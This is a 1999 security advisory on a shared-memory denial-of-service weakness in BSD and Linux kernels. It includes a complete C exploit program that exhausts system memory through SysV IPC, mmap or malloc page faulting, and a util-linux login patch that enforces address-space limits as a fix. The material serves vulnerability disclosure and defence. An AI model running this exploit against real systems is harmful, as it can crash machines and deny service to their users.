19th Jul 1999 [SBWID-114]
COMMAND
	    Shared memory (IPC)
SYSTEMS AFFECTED
	    Most BSD kernels
PROBLEM
	    Mike Perry posted the following.  While fiddling with various IPC
	    mechanisms and reading The Design and Implementation of 4.4BSD, a
	    few things struck him as potentially dangerous.  According to the
	    book, when you request a shared memory segment via mmap(), the
	    file isn't actually physically in memory until you start to
	    trigger page faults and cause the vnode-pager to page in the data
	    from the file.  Then, the following passage from shmctl(2) under
	    Linux caught his eye: "The user must ensure that a segment is
	    eventually destroyed; otherwise its pages that were faulted in
	    will remain in memory or swap."
	    It turns out that it is in fact possible to create a DoS
	    condition by requesting a truckload of shared memory, then
	    triggering page faults across the entire shared region.  The end
	    result is no different from a simple fork or malloc bomb, but it
	    is considerably harder to prevent on most systems.  This is mainly
	    because:
	
	        1. The system does not check rlimits for mmap and shmget
	           (FreeBSD)
	        2. The system never bothers to offer the ability to set the
	           rlimits for virtual memory via shells, login process, or
	           otherwise.  (Linux)
	        3. a. The system does not watch to make sure you don't share
	              more memory than exists.  (Linux, Irix, BSD?)
	           b. The system does not actually allocate shared memory
	              until a page fault is triggered (this could be argued to
	              be a feature - Linux, *BSD)
	        4. With System V IPC, shared memory persists even after the
	           process is gone.  So even though the kernel may kill the
	           process after it exhausts all memory from page faults,
	           there is still no memory left for the system.  (Presumably,
	           with some trickery, you might be able to achieve the same
	           results by shared mmap()'ing a few large files between
	           pairs of processes.)  (All)
	
	    Mike attached a program that will exploit these conditions using
	    either shmget(), mmap(), or by getting malloc to mmap() (in
	    order of effectiveness).  This program should compile on any
	    architecture.  SGI Irix is not vulnerable.  From reading The
	    Design and Implementation of 4.4BSD, it sounds as if the BSDs
	    should all be vulnerable.  FreeBSD will mmap as much memory as you
	    tell it.  Note that Mike posted the wrong file: as posted, the
	    default attack is __FUXX0R_MMAP__.  He meant to post one that had
	    the default attack of __FUXX0R_SYSV__, and with __REALLY_FUXX0R__
	    undefined (so the program wouldn't actually page fault and kill
	    your system, if you just wanted to see whether limits would kick
	    in).  Please change these before running the exploit.  System V
	    IPC is where the real kernel crusher is.
	    It seems that OpenBSD 2.5-current (Jul 3) is vulnerable.  The
	    place to check whether you're vulnerable is sys/resource.h, or, if
	    you're on BSD and have kernel source, checking sys/vm/vm_mmap.c
	    for an RLIMIT other than STACK should let you know.  The proper
	    way to fix this is to have a separate limit for address space or
	    virtual memory.  Solaris has both (probably since their malloc
	    uses both brk and mmap, and the virtual memory limit is for
	    stopping malloc bombs).
	
	    /*
	     * This program can be used to exploit DoS bugs in the VM systems or utility
	     * sets of certain OS's.
	     *
	     * Common problems:
	     * 1. The system does not check rlimits for mmap and shmget (FreeBSD)
	     * 2. The system never bothers to offer the ability to set the rlimits for
	     *    virtual memory via shells, login process, or otherwise. (Linux)
	     * 3. a. The system does not watch to make sure you don't share more memory
	     *       than exists. (Linux, Irix, BSD?)
	     *    b. The system does not actually allocate shared memory until a page fault
	     *       is triggered (this could be argued to be a feature - Linux, *BSD)
	     * 4. With System V IPC, shared memory persists even after the process is
	     *    gone. So even though the kernel may kill the process after it exhausts all
	     *    memory from page faults, there still is 0 memory left for the system.
	     *    (All)
	     *
	     * This program should compile on any architecture. SGI Irix is not
	     * vulnerable. From reading The Design and Implementation of 4.4BSD it sounds
	     * as if the BSDs should all be vulnerable. FreeBSD will mmap as much memory
	     * as you tell it. I haven't tried page faulting the memory, as the system is
	     * not mine. I'd be very interested to hear about OpenBSD...
	     *
	     * This program is provided for vulnerability evaluation ONLY. DoS's aren't
	     * cool, funny, or anything else. Don't use this on a machine that isn't
	     * yours!!!
	     */
	    #include <stdio.h>
	    #include <errno.h>
	    #include <sys/ipc.h>
	    #include <sys/shm.h> /* redefinition of LBA.. PAGE_SIZE in both cases.. */
	    #ifdef __linux__
	    #include <asm/shmparam.h>
	    #include <asm/page.h>
	    #endif
	    #include <sys/types.h>
	    #include <stdlib.h>
	    #include <string.h>
	    #include <unistd.h>
	    #include <sys/stat.h>
	    #include <sys/fcntl.h>
	    #include <sys/mman.h>
	    int len;
	    #define __FUXX0R_MMAP__
	    /* mmap also implements the copy-on-fault mechanism, but because the only way
	     * to easily exploit this is to use anonymous mappings, once the kernel kills
	     * the offending process, you can recover. (Although swap death may still
	     * occur.) */
	    /* #define __FUXX0R_MMAP__ */
	    /* Most mallocs use mmap to allocate large regions of memory. */
	    /* #define __FUXX0R_MMAP_MALLOC__ */
	    /* Guess what this option does :) */
	    #define __REALLY_FUXX0R__
	    /* From glibc 2.1.1 malloc/malloc.c */
	    #define DEFAULT_MMAP_THRESHOLD (128 * 1024)
	    #ifndef PAGE_SIZE
	    # define PAGE_SIZE 4096
	    #endif
	    #ifndef SHMSEG
	    # define SHMSEG 256
	    #endif
	    #if defined(__FUXX0R_MMAP_MALLOC__)
	    void *mymalloc(int n)
	    {
	        if(n <= DEFAULT_MMAP_THRESHOLD)
		    n = DEFAULT_MMAP_THRESHOLD + 1;
	        return malloc(n);
	    }
	    void myfree(void *buf)
	    {
	        free(buf);
	    }
	    #elif defined(__FUXX0R_MMAP__)
	    void *mymalloc(int n)
	    {
	        int fd;
	        void *ret;
	        fd = open("/dev/zero", O_RDWR);
	        ret = mmap(0, n, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);
	        close(fd);
	        return (ret == (void *)-1 ? NULL : ret);
	    }
	    void myfree(void *buf)
	    {
	        munmap(buf, len);
	    }
	    #elif defined(__FUXX0R_SYSV__)
	    void *mymalloc(int n)
	    {
	        char *buf;
	        static int i = 0;
	        int shmid;
	        i++; /* 0 is IPC_PRIVATE */
	        if((shmid = shmget(i, n, IPC_CREAT | SHM_R | SHM_W)) == -1)
	        {
	    #if defined(__irix__)
	    	    if (shmctl (shmid, IPC_RMID, NULL))
		    {
		        perror("shmctl");
		    }
	    #endif
		    return NULL;
	        }
	        if((buf = shmat(shmid, 0, 0)) == (char *)-1)
	        {
	    #if defined(__irix__)
	    	    if (shmctl (shmid, IPC_RMID, NULL))
		    {
		        perror("shmctl");
		    }
	    #endif
		    return NULL;
	        }
	    #ifndef __REALLY_FUXX0R__
	        if (shmctl (shmid, IPC_RMID, NULL))
	        {
		    perror("shmctl");
	        }
	    #endif
	        return buf;
	    }
	    void myfree(void *buf)
	    {
	        shmdt(buf);
	    }
	    #endif
	    #ifdef __linux__
	    void cleanSysV()
	    {
	        struct shmid_ds shmid;
	        struct shm_info shm_info;
	        int id;
	        int maxid;
	        int ret;
	        int shid;
	        maxid = shmctl (0, SHM_INFO, (struct shmid_ds *) &shm_info);
	        printf("maxid %d\n", maxid);
	        for (id = 0; id <= maxid; id++)
	        {
		    if((shid = shmctl (id, SHM_STAT, &shmid)) < 0)
		        continue;
		    if (shmctl (shid, IPC_RMID, NULL))
		    {
		        perror("shmctl");
		    }
		    printf("id %d has %d attachments\n", shid, shmid.shm_nattch);
		    shmid.shm_nattch = 0;
		    shmctl(shid, IPC_SET, &shmid);
		    if(shmctl(shid, SHM_STAT, &shmid) < 0)
		    {
		        printf("id %d deleted successfully\n", shid);
		    }
		    else if(shmid.shm_nattch == 0)
		    {
		        printf("Still able to stat id %d, but has no attachments\n", shid);
		    }
		    else
		    {
		        printf("Error, failed to remove id %d!\n", shid);
		    }
	        }
	    }
	    #endif
	    int main(int argc, char **argv)
	    {
	        int shmid;
	        int i = 0;
	        char *buf[SHMSEG * 2];
	        int max;
	        int offset;
	        if(argc < 2)
	        {
		    printf("Usage: %s <[0x]size of segments>\n", argv[0]);
	    #ifdef __linux__
		    printf("    or %s --clean (destroys all of IPC space you have permissions to)\n", argv[0]);
	    #endif
		    exit(0);
	        }
	    #ifdef __linux__
	        if(!strcmp(argv[1], "--clean"))
	        {
		    cleanSysV();
		    exit(0);
	        }
	    #endif
	        len = strtol(argv[1], NULL, 0);
	        for(buf[i] = mymalloc(len); i < SHMSEG * 2 && buf[i] != NULL; buf[++i] = mymalloc(len))
		    ;
	        max = i;
	        perror("Stopped because");
	        printf("Maxed out at %d %d byte segments\n", max, len);
	    #if defined(__FUXX0R_SYSV__) && defined(SHMMNI)
	        printf("Despite an alleged max of %d (%d per proc) %d byte segs. (Page "
		        "size: %d), \n", SHMMNI, SHMSEG, SHMMAX,  PAGE_SIZE);
	    #endif
	    #ifdef __REALLY_FUXX0R__
	        fprintf(stderr, "Page faulting alloced region... Have a nice life!\n");
	        for(i = 0; i < max; i++)
	        {
		    for(offset = 0; offset < len; offset += PAGE_SIZE)
		    {
		        buf[i][offset] = '*';
		    }
		    printf("wrote to %d bytes of memory, final offset %d\n", len, offset);
	        }
	        // never reached :(
	    #else
	        for(i = 0; i <= max; i++)
	        {
		    myfree(buf[i]);
	        }
	    #endif
	        exit(42);
	    }
	
	    For people who used small segments and caused the program to
	    segfault: this is because the default attack is mmap, and you
	    can create an effectively unlimited number of private mappings.
	    The program uses an array of pointers to keep track of the memory
	    so that it can free it when the __REALLY_FUXX0R__ option isn't
	    set, so with small segments you overrun that array.  The array
	    size is 2 times the per-process limit for SysV IPC segments, so
	    it will not be overrun with that attack.
SOLUTION
	    Below is a patch to util-linux-2.9o login.c (and pathnames.h) that
	    provides a means under Linux (it should be pretty portable to
	    other OS's) to set the address space limit (RLIMIT_AS: the rlimit
	    that controls how much data you can actually map into your
	    process).  The patch is based on an old program called lshell
	    that set limits by wrapping your shell.  Sample /etc/limits file:
	
	        # Limit the user guest to 5 minutes CPU time and 8 procs, 5Mb address space
	        guest C5P8V5D2
	        # 60 min's CPU time, 30 procs, 15Mb data, 50 megs total address space, 5 megs
	        # stack, 15 megs of RSS.
	        default C60P30D15V50S5R15
	
	    At the very least, a default of V<size of physical memory> is
	    recommended.  You can use lowercase letters for the next lowest
	    order of magnitude of units (for example, v for kilobytes instead
	    of V for megabytes).  The comment in the patch explains it in
	    further detail.  Note that even in this case, a determined user
	    can probably just log in a dozen or so times and use SysV IPC to
	    steal the system memory.
	
	    diff -ur ./util-linux-2.9o/lib/pathnames.h ./util-linux-2.9o-mp/lib/pathnames.h
	    --- ./util-linux-2.9o/lib/pathnames.h	Sun Oct 11 14:19:16 1998
	    +++ ./util-linux-2.9o-mp/lib/pathnames.h	Wed Jul 14 22:51:13 1999
	    @@ -86,6 +86,7 @@
	     #define _PATH_SECURE		"/etc/securesingle"
	     #define _PATH_USERTTY           "/etc/usertty"
	    +#define _PATH_LIMITS		"/etc/limits"
	     #define _PATH_MTAB		"/etc/mtab"
	     #define _PATH_UMOUNT		"/bin/umount"
	    diff -ur ./util-linux-2.9o/login-utils/login.c ./util-linux-2.9o-mp/login-utils/login.c
	    --- ./util-linux-2.9o/login-utils/login.c	Sat Mar 20 14:20:16 1999
	    +++ ./util-linux-2.9o-mp/login-utils/login.c	Wed Jul 14 22:49:24 1999
	    @@ -185,6 +185,7 @@
	     char *stypeof P_((char *ttyid));
	     void checktty P_((char *user, char *tty, struct passwd *pwd));
	     void sleepexit P_((int eval));
	    +void setup_limits P_((struct passwd *pwd));
	     #ifdef CRYPTOCARD
	     int cryptocard P_((void));
	     #endif
	    @@ -1110,6 +1111,8 @@
	         childArgv[childArgc++] = NULL;
	    +    setup_limits(pwd);
	    +
	         execvp(childArgv[0], childArgv + 1);
	         if (!strcmp(childArgv[0], "/bin/sh"))
	    @@ -1120,6 +1123,161 @@
	         exit(0);
	     }
	    +
	    +/* Most of this code ripped from lshell by Joel Katz */
	    +void process(char *buf)
	    +{
	    +    /* buf is of the form [Fn][Pn][Ct][Vm][Sm][Rm][Lm][Dm] where */
	    +    /* F specifies n max open files */
	    +    /* P specifies n max procs */
	    +    /* c specifies t seconds of cpu */
	    +    /* C specifies t minutes of cpu */
	    +    /* v specifies m kbs of total virtual memory (address space) */
	    +    /* V specifies m megs of total virtual memory (address space) */
	    +    /* s specifies m kbs of stack */
	    +    /* S specifies m megs of stack */
	    +    /* r specifies m kbs of RSS */
	    +    /* R specifies m megs of RSS */
	    +    /* l specifies m kbs of locked (non-swappable) memory */
	    +    /* L specifies m megs of locked (non-swappable) memory */
	    +    /* d specifies m kbs of Data segment */
	    +    /* D specifies m megs of Data segment */
	    +
	    +    struct rlimit rlim;
	    +    char *pp = buf;
	    +    int i;
	    +
	    +    while(*pp!=0)
	    +    {
	    +	i = 1;
	    +	switch(*pp++)
	    +	{
	    +	    case 'f':
	    +	    case 'F':
	    +		i = atoi(pp);
	    +		if(!i)
	    +		    break;
	    +		rlim.rlim_cur = i;
	    +		rlim.rlim_max = i;
	    +		setrlimit(RLIMIT_NOFILE, &rlim);
	    +		break;
	    +	    case 'p':
	    +	    case 'P':
	    +		i = atoi(pp);
	    +		if(!i)
	    +		    break;
	    +		rlim.rlim_cur = i;
	    +		rlim.rlim_max = i;
	    +		setrlimit(RLIMIT_NPROC, &rlim);
	    +		break;
	    +	    case 'C':
	    +		i = 60;
	    +	    case 'c':
	    +		i *= atoi(pp);
	    +		if(!i)
	    +		    break;
	    +		rlim.rlim_cur = i;
	    +		rlim.rlim_max = i;
	    +		setrlimit(RLIMIT_CPU, &rlim);
	    +		break;
	    +	    case 'V':
	    +		i = 1024;
	    +	    case 'v':
	    +		i *= atoi(pp)*1024;
	    +		if(!i)
	    +		    break;
	    +		rlim.rlim_cur = i;
	    +		rlim.rlim_max = i;
	    +#if defined(RLIMIT_AS) /* Linux */
	    +		setrlimit(RLIMIT_AS, &rlim);
	    +#elif defined(RLIMIT_VMEM) /* Irix */
	    +		setrlimit(RLIMIT_VMEM, &rlim);
	    +#endif
	    +		break;
	    +	    case 'S':
	    +		i = 1024;
	    +	    case 's':
	    +		i *= atoi(pp)*1024;
	    +		if(!i)
	    +		    break;
	    +		rlim.rlim_cur = i;
	    +		rlim.rlim_max = i;
	    +		setrlimit(RLIMIT_STACK, &rlim);
	    +		break;
	    +	    case 'R':
	    +		i = 1024;
	    +	    case 'r':
	    +		i *= atoi(pp)*1024;
	    +		if(!i)
	    +		    break;
	    +		rlim.rlim_cur = i;
	    +		rlim.rlim_max = i;
	    +		setrlimit(RLIMIT_RSS, &rlim);
	    +		break;
	    +	    case 'L':
	    +		i = 1024;
	    +	    case 'l':
	    +		i *= atoi(pp)*1024;
	    +		if(!i)
	    +		    break;
	    +		rlim.rlim_cur = i;
	    +		rlim.rlim_max = i;
	    +		setrlimit(RLIMIT_MEMLOCK, &rlim);
	    +		break;
	    +	    case 'D':
	    +		i = 1024;
	    +	    case 'd':
	    +		i *= atoi(pp)*1024;
	    +		if(!i)
	    +		    break;
	    +		rlim.rlim_cur = i;
	    +		rlim.rlim_max = i;
	    +		setrlimit(RLIMIT_DATA, &rlim);
	    +		break;
	    +	}
	    +    }
	    +}
	    +
	    +void setup_limits(struct passwd *pw)
	    +{
	    +    FILE *fp;
	    +    int i;
	    +    char buf[200], name[20] = "", limits[64] = "";
	    +    char *p;
	    +
	    +    if(pw->pw_uid == 0)
	    +    {
	    +	return;
	    +    }
	    +
	    +    if((fp = fopen(_PATH_LIMITS,"r")) == NULL)
	    +    {
	    +	return;
	    +    }
	    +
	    +    while(fgets(buf, 200, fp) != NULL)
	    +    {
	    +	if(buf[0] == '#')
	    +	    continue;
	    +
	    +	p = strchr(buf, '#');
	    +	if(p)
	    +	    *p = 0;
	    +
	    +	i=sscanf(buf, "%19s %63s", name, limits);
	    +
	    +	if(!strcmp(name, pw->pw_name))
	    +	{
	    +	    if(i==2)
	    +		process(limits);
	    +	    fclose(fp);
	    +	    return;
	    +	}
	    +    }
	    +    fclose(fp);
	    +    process(limits); /* Last line is default */
	    +}
	    +
	     void
	     getloginname()
	
	    SysVinit (>2.54) uses /etc/initscript (or /sbin/initscript) to
	    spawn the processes listed in /etc/inittab, so you can set limits
	    within that (e.g. for the getty processes).  Either wrap
	    in.telnetd or use -L to wrap the login program.  Set limits in
	    the rc.init2 (etc) script for daemons which may execute
	    user-defined code (e.g. crond, httpd).  Similarly for xdm via
	    Xstartup.  You might also want to wrap your MDAs if you are using
	    procmail or allow program aliases in ~/.forward files.
	    In short, you have to use PAM, SysV init, or the patch.  Lshell
	    does not set the RLIMIT_AS limit either; you have to patch it.
	    After more research, it seems that System V implements
	    RLIMIT_VMEM to stop people from exploiting this problem, but
	    apparently when BSD implemented the Sys V IPC, they neglected to
	    add an appropriate RLIMIT.
	
